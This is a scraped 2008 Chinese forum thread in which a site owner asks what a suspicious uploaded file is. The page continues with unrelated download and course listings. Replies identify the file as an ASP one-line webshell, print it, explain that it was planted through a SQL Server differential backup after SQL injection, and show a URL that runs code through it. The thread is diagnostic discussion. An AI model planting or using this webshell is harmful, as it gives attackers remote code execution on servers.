2.8w+
社区成员
- 全部
请问这种木马代码是如何加密的,用啥能解密
有人传木马上我空间,有谁能帮我看下这是如何加密的
我想看下,代码内容,看看这代码是干吗的
头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <
中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
我想看下,代码内容,看看这代码是干吗的
头1行:
TAPE??咊,^a <Microsoft SQL ServerSPAD^LSFMB 8曀`SSETd?za <
中间一段
?/8
/?
{@T?8/?ΥQ?
/?8
/?
?T?8/?ΥQ?/?8/?ΥQ?B/?8
/?
{S?8/?ΥQ/?8
/?T?4/?ΥQFt/??D
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
gingerkang 2008-04-09
[Quote=引用 6 楼 chinmo 的回复:]
这个兄弟说得不错
看来也是很熟悉的啊
[/Quote]
对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
这个兄弟说得不错
看来也是很熟悉的啊
[/Quote]
对此以前就有所了解,在baidu,google上搜索也会有很多相关的文章介绍.
问题出来web服务和sqlserver服务共用一台服务器,而且sqlserver分配的帐号权限给得太大,dbo就已经具备备份数据库的权限,一个虚拟主机用到了该权限的帐号,只要该站点存在注入,这台服务器的所有站点都是鱼肉了.
Atai-Lu 2008-04-09
看不懂,哎~
一把编程的菜刀 2008-04-09
[Quote=引用 2 楼 gingerkang 的回复:]
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]
这个兄弟说得不错
看来也是很熟悉的啊
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
[/Quote]
这个兄弟说得不错
看来也是很熟悉的啊
liyong888_8 2008-04-09
jf
hookee 2008-04-09
主要是生成的asp文件注入了<%execute(request("a"))%>,前后的字符都没有关系
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
访问的时候可以 1.asp?a=asp代码 的方式
比如 1.asp?a=response.write(server.mappath("/")):response.end
black__art 2008-04-09
呵呵,JF
gingerkang 2008-04-08
<%execute(request("a"))%>
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
一句话木马,没有加什么密,明显是用sqlserver差异备份得到的shell
XUZIFENG 2008-04-08
对了 中间还有这类的
P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4
c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?
我运行这些代码出错 说
Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行
P
^/?/?睶(/?�TT? <%execute(request("a"))%>爆鹣`8?`8?`鹣`鹣`P爆\爆o5J4
c/?#a`P�"睶3築栳@tAllocate RootD/?
"睶?(/??`/D/?
"睶?c/??pX/?
我运行这些代码出错 说
Microsoft VBScript 运行时错误 (0x800A000D)
类型不匹配: 'execute'
/1.asp, 第 33 行
IBM Tivoli Storage Manager 白皮书 IBM Tivoli Storage Manager 白皮书,详细介绍了关于IBM Tivoli Storage Manager的基础。Tivoli Storage Manager 简称TSM,是IBM Tivoli软件家族中的旗舰产品之一
敏捷软件开发-原则、模式与实践.pdf 本书讲授了一些原则、模式以及实践,它们可以帮助软件开发人员在追求美的程序、设计以及团队的道路上迈出第一步。本书探索了基本的设计原则,软件设计结构的通用模式以及有利于团队融为一个有机整体的一系列实践。本书包含了许多代码,仔细研读这些代码是学习本书所教授的原则、模式及时间的最有效方法
juniper路由器学习资料 从网络搜集的关于juniper的资源,包含
fru-mx960-acoustic.pdf
fru-mx960-cable-manager.pdf
JNCIA_学习指南中文.pdf
Juniper_EX交换机中文操作手册V1.0.pdf
Juniper_MX_路由器介绍.pdf
Juniper_MX960配置模板v1.2.docx
Juniper_netscreen.ppt
Juniper路由器(M10i)配置手册.pdf
Juniper路由器命令行配置手册.pdf
Juniper路由器实验手册.pdf
junos-cli.pdf
junos-release-notes-13.3.pdf
mx960-hwguide.pdf
mx960-install-quick-start.pdf
MX960操作维护介绍.pdf
MX960路由器操作手册.pdf
mx-series-line-card-guide.pdf
中国象棋人工智能论文集 这是本人收集的有关中国象棋人工智能的论文集
2009计算机博弈专辑文章.pdf
Computer Games Are an Efficient Tool for Event Game Theory.pdf
MINORS HASH TABLE IN COMPUTER CHINESE CHESS.pdf
中国象棋机器博弈的时间自适应分配策略研究.pdf
中国象棋计算机博弈中搜索算法的研究与改进.pdf
中国象棋计算机博弈关键技术分析.pdf
人工神经元网络结合TD(λ)算法在中国象棋机器博弈中的应用.pdf
博弈论的里程碑成果与局限性分析.pdf
基于剪枝策略的中国象棋搜索引擎研究.pdf
基于机器博弈的作战模拟系统探讨.pdf
大师级象棋机器人研究与开发.pdf
机器博弈研究面临的各种挑战.pdf
棋牌游戏与事件对策.pdf
积极开展民间棋类的计算机博弈活动.pdf
解剖大象的眼睛-中国象棋开发.pdf
计算机博弈原理与方法学概述.pdf
Unity3D实战入门之第三人称射击游戏(TPS) 这是一套第三人称射击游戏开发的入门基础课程。
本课程以一款小型的第三人称射击游戏为案例,手把手教你如何搭建一款3D射击游戏的雏形。麻雀虽小,五脏俱全,这款小游戏难度不大,但第三人称射击游戏该有的模块、功能它都有涉及。通过案例游戏的开发,学习者可以对第三人称射击游戏入门,对后续复杂大中型3D游戏的开发有实际的借鉴意义。
这套课程,对初次接触3D射击类游戏的学习者而言,是一块极好的跳板。 本课程从零开始,带领学习者逐步完成一款小型的第三人称射击游戏。向3D射击类游戏的初学者展示完整项目的制作流程和设计思路,对该类游戏的常用知识点、必备功能模块、代码结构进行详细讲解,让学习者能够快速搭建一款3D射击游戏的雏形,为后续中、大型游戏的开发打下良好基础。
QT实战之监控系统 本课程基本Qt for windows平台下开发的监控界面程序,支持添加摄像头播放监控画面,支持1、4、9、16分屏显示,通过封装播放器,可以支持多协议,本地视频多种播放方式,随意封装播放器功能,并且可在此基础上对本次监控系统进行二次开发,友好的界面操作,支持系统拖盘,全屏多分屏显示等。 本课程一步一步的实现整个监控系统页面,最终实现整个监控系统,通过学习本教程能快速学会Qt for windows下QT界面开发,并且对于流媒体有一定的了解,通过封装三方播放器可以轻松学会实现封装自己所需要的功能。另外本教程基于实际项目做课程演讲开发,可以学到真实项目开发经验。
linux网络内核书合集01 本合集是本人搜集的关于linux网络内核的书籍,都是经典,包含:(1)Linux网络体系结构:Linux内核中网络协议的设计与实现.chm (2)Linux网络内核分析与开发.pdf (3)嵌入式Linux网络体系结构设计与TCP/IP协议栈.pdf (4)深入理解LINUX网络技术内幕.pdf 第一本是英文版chm格式,其余三本均为中文版,扫描清晰
掌握C语言链表 链表是一种使用极其广泛的数据结构,它也可以用来作为实现栈、队列等数据结构的基础,链表没有像数组需要预先知道数据大小的缺点,可充分利用计算机内存,实现动态灵活的内存管理。除非需要频繁的通过下标来随机访问各个数据,否则数组都可以用链表代替。链表作为C语言数据结构的难点,更是面试中必考的知识点。 此课程是黄强老师针对C语言链表的专题课程,通过对链表通俗的讲解,结合简单易懂的代码,帮助学员对链表快速的理解,并讲结合真实企业开发中链表常用的算法技巧,从而帮助学员高效,快速、灵活的掌握链表这一难点!
C语言嵌入式Linux编程第3期:程序的编译、链接和运行 本课程为《C语言嵌入式Linux编程》第3期,主要对程序的编译、链接及运行机制进行分析。同时对静态库链接、动态链接的过程、插件原理、内核模块运行机进行探讨,后对嵌入式系统比较难理解的u-boot重定位、u-boot加载内核、内核解压缩、重定位过程进行分析,加深对程序的编译链接原理的理解。 掌握程序的编译、链接、运行基本原理。掌握u-boot引导内核启动、u-boot的重定位等嵌入式核心技术。
QT/C++从新手到老手系列之QT基础篇 本系列课程励志于带领你学习QT5/C++,从开发环境(QTCreator和VS2013两种)搭建到实际项目实战,从入门到精通。每一个部分均有理论知识介绍、接口讲解、实例代码讲解,讲解过程中不断穿插老师在开发过程中遇到的问题及解决方法。本阶段主要学习Qt开发环境搭建(QTCreator及VS)、程序的发布、GUI控件的属性、方法、布局管理、容器类、QT事件处理等,学完本阶段后可以开发小型的应用程序。 本阶段主要完成Qt开发环境搭建、程序的开发和发布、基于Widget的图形控件属性和方法的使用、布局管理、容器类、QT事件处理等几个方面知识的学习,通过上述几个方面知识的学习,可以开发一个小型的应用程序。
QT实战之监控回看系统 本课程基本Qt for windows平台下开发的监控回看界面程序,通过选择界面上的时间和日期可以准确定位观看过去的某一年某一日某个时刻的监控画面,支持对接第三方海康设备的功能,同时也能对于学习QT有很大的帮助。 学会对接第三方设备,学会QT开发,学会界面布局,学会界面设计。
C语言及程序设计初步 课程针对没有任何程序设计基础的初学者,全面介绍C语言及利用C语言进行程序设计的方法。课程注重知识的传授,更关注学习者能够通过实践的方式,真正学会利用C语言解决问题,奠定程序设计的基础。为此,专门设计了实践方案,指导学习者在听讲的同时,有效完成实践。讲课中还适时穿插进行学习指导,帮助初学者尽快掌握程序设计的学习方法。 课程主要针对无任何编程经历的初学者,利用主讲者多年来教授大一学生的教学经验,准确把握知识点掌握中的难点,在和视频配套的实践方案配合下,帮助初学者顺利掌握知识,获得学习中的自信。
Qt图形视图框架详解 介绍Qt中的Graphics View Framework,涉及View、Scene、Item的关系,如何自定义QGraphicsItem、处理Item之间的关联、如何布局及定义自己的布局Item、如何变幻Item、如何应用动画、如何处理拖放、如何给Item应用图形效果,提供拼图游戏、画板两个有用的实例。 通过本课程的学习,能够掌握Qt Graphics View Framework的基本应用,使用图形视图框架开发需要丰富的GUI效果的应用软件以及需要维护大量图元的、对图形界面层次要求较高的应用。
